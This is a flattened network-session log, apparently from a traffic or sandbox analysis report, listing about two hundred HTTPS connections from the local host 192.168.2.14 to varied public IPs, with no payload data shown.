                                                        17977192.168.2.1439906105.14.168.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17978192.168.2.1446842112.150.164.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17979192.168.2.144414488.37.131.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17980192.168.2.145698883.174.18.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17981192.168.2.1449870164.115.123.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17982192.168.2.145894850.140.5.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17983192.168.2.1446740174.22.229.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17984192.168.2.1439676130.169.20.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17985192.168.2.1438356199.116.131.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17986192.168.2.1457558144.79.203.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17987192.168.2.1451164185.49.90.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17988192.168.2.143880618.243.245.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17989192.168.2.1449202146.127.138.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17990192.168.2.1434710153.75.60.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17991192.168.2.144931671.202.87.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17992192.168.2.143838868.223.143.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17993192.168.2.144564888.121.201.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17994192.168.2.1438542154.58.188.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17995192.168.2.1454958112.17.72.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17996192.168.2.144358690.20.137.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17997192.168.2.145545092.116.207.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17998192.168.2.144290017.8.49.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17999192.168.2.145973474.227.11.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18000192.168.2.143701842.126.129.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18001192.168.2.143290034.76.233.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18002192.168.2.1446550143.98.77.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18003192.168.2.144996466.114.139.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18004192.168.2.1435300114.182.191.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18005192.168.2.1433548137.62.28.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18006192.168.2.144291017.102.43.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18007192.168.2.143632057.44.37.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18008192.168.2.1458420168.76.183.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18009192.168.2.1454336102.60.173.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18010192.168.2.1443108106.82.252.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18011192.168.2.1440704124.255.142.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18012192.168.2.1451830105.169.87.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18013192.168.2.1455506134.76.219.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18014192.168.2.1449782216.137.229.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18015192.168.2.144142044.212.57.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18016192.168.2.144793650.123.134.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18017192.168.2.1439160112.79.243.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18018192.168.2.1435680204.45.239.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18019192.168.2.145037235.121.200.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18020192.168.2.146071034.144.255.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18021192.168.2.146072631.35.242.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18022192.168.2.1436406110.157.146.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18023192.168.2.1446918173.194.73.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18024192.168.2.146025098.75.77.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18025192.168.2.1454666133.239.144.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18026192.168.2.1448984199.181.34.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18027192.168.2.1449028210.171.17.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18028192.168.2.1444262223.154.125.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18029192.168.2.1446236128.206.153.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18030192.168.2.14327705.121.171.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18031192.168.2.145375614.212.158.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18032192.168.2.1438254161.74.83.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18033192.168.2.1452078113.195.114.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18034192.168.2.1454560209.21.154.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18035192.168.2.143955831.234.185.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18036192.168.2.145827667.253.119.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18037192.168.2.145878218.123.75.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18038192.168.2.1451488212.217.244.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18039192.168.2.14355242.228.44.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18040192.168.2.14479282.35.143.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18041192.168.2.145250295.33.27.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18042192.168.2.1457480188.143.87.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18043192.168.2.143436032.166.247.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18044192.168.2.1435022124.147.168.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18045192.168.2.143554024.36.97.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18046192.168.2.144040841.203.35.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18047192.168.2.1442348196.133.123.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18048192.168.2.1459050150.131.17.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18049192.168.2.143381483.18.33.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18050192.168.2.1434132111.168.120.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18051192.168.2.1441968188.126.50.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18052192.168.2.144017223.124.129.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18053192.168.2.14496369.78.70.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18054192.168.2.1460300147.73.251.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18055192.168.2.1450112221.250.209.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18056192.168.2.1454536167.71.167.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18057192.168.2.1433622168.210.86.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18058192.168.2.1440064188.117.122.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18059192.168.2.1441318125.129.132.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18060192.168.2.145148880.95.159.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18061192.168.2.1434238176.209.186.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18062192.168.2.1448736121.23.133.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18063192.168.2.1449996100.154.56.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18064192.168.2.144946613.10.156.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18065192.168.2.1451440119.147.179.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18066192.168.2.145365853.64.201.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18067192.168.2.143898284.200.140.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18068192.168.2.1447958208.56.98.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18069192.168.2.1444924125.4.129.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18070192.168.2.145995299.44.134.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18071192.168.2.1441872209.246.38.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18072192.168.2.143291037.10.160.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18073192.168.2.1450634105.95.142.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18074192.168.2.1448210222.185.91.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18075192.168.2.14341404.144.229.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18076192.168.2.1460504159.134.143.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18077192.168.2.1460214155.56.249.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18078192.168.2.1442804102.171.86.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18079192.168.2.143653219.210.230.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18080192.168.2.143289047.28.41.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18081192.168.2.1435492205.168.73.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18082192.168.2.144425818.61.242.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18083192.168.2.1446424162.112.254.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18084192.168.2.1444334123.140.71.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18085192.168.2.144113487.43.52.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18086192.168.2.1449308166.107.155.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18087192.168.2.144163280.97.254.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18088192.168.2.1437456101.115.73.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18089192.168.2.14419064.246.183.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18090192.168.2.1457206169.64.96.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18091192.168.2.1460510128.160.3.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18092192.168.2.1437070102.159.230.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18093192.168.2.1451334173.248.130.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18094192.168.2.144572285.28.64.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18095192.168.2.1455582161.142.108.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18096192.168.2.1455492207.184.128.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18097192.168.2.143954490.28.167.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18098192.168.2.144444248.239.205.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18099192.168.2.1441198115.234.231.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18100192.168.2.1450490191.34.148.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18101192.168.2.143383238.166.21.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18102192.168.2.1447962154.93.62.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18103192.168.2.144128491.8.34.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18104192.168.2.144022418.103.181.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18105192.168.2.1434884194.92.150.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18106192.168.2.1460106209.167.130.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18107192.168.2.1448704196.157.11.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18108192.168.2.1458638100.252.47.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18109192.168.2.145569846.170.75.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18110192.168.2.1445162138.137.208.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18111192.168.2.145927097.64.65.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18112192.168.2.1440226126.126.150.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18113192.168.2.1458998141.181.106.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18114192.168.2.144312820.235.37.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18115192.168.2.1447374203.136.132.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18116192.168.2.14469309.28.176.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18117192.168.2.1452956148.194.122.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18118192.168.2.145882213.222.241.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18119192.168.2.145535437.130.71.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18120192.168.2.1450064200.3.104.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18121192.168.2.145966260.238.13.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18122192.168.2.1437616117.130.81.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18123192.168.2.1460988135.95.10.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18124192.168.2.145607871.89.175.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18125192.168.2.1439632109.80.24.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18126192.168.2.1454404171.138.232.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18127192.168.2.145096084.130.176.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18128192.168.2.145508499.12.51.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18129192.168.2.144894250.69.178.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18130192.168.2.143396090.230.255.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18131192.168.2.1458716172.76.212.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18132192.168.2.1437222172.205.37.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18133192.168.2.1434608209.15.157.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18134192.168.2.145699842.150.235.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18135192.168.2.1443488185.178.240.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18136192.168.2.1444444154.131.91.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18137192.168.2.1455792101.225.97.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18138192.168.2.1446868177.223.42.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18139192.168.2.1452342133.49.109.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18140192.168.2.1440756119.100.181.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18141192.168.2.143719646.31.185.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18142192.168.2.1439692152.46.159.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18143192.168.2.1457322179.59.187.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18144192.168.2.143835489.133.175.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18145192.168.2.143402620.71.181.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18146192.168.2.146029481.145.109.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18147192.168.2.14595488.73.48.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18148192.168.2.1437658169.163.204.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18149192.168.2.1441342198.121.13.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18150192.168.2.1444932180.82.150.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18151192.168.2.1458160212.84.6.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18152192.168.2.143972696.38.156.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18153192.168.2.144545262.48.175.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18154192.168.2.1453180140.149.95.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18155192.168.2.144578231.252.203.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18156192.168.2.1437678151.191.191.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18157192.168.2.1444386161.148.137.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18158192.168.2.1443200202.228.21.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18159192.168.2.1446122184.4.178.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18160192.168.2.1442902100.213.161.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18161192.168.2.1457040186.212.69.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18162192.168.2.1436976110.120.98.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18163192.168.2.145403612.178.215.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18164192.168.2.1445888219.191.139.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18165192.168.2.1456772104.122.185.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18166192.168.2.1457342184.38.70.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18167192.168.2.143869454.37.77.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18168192.168.2.1454856134.19.147.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18169192.168.2.1440880211.166.154.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18170192.168.2.1449720157.80.147.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18171192.168.2.1458320163.137.242.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18172192.168.2.1438182187.97.67.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18173192.168.2.143589846.184.1.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18174192.168.2.145823260.25.241.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18175192.168.2.1445966190.151.236.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18176192.168.2.146030060.81.235.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18177192.168.2.1434094141.105.157.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18178192.168.2.1444846161.227.166.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18179192.168.2.1445980168.170.26.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18180192.168.2.1460370108.148.2.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18181192.168.2.1439682166.58.15.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18182192.168.2.1442482162.2.170.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18183192.168.2.1437250137.134.110.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18184192.168.2.146020071.84.173.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18185192.168.2.14572149.171.157.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18186192.168.2.14394108.137.140.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18187192.168.2.1435484169.4.187.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18188192.168.2.143535645.187.42.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18189192.168.2.1457232116.78.76.231443
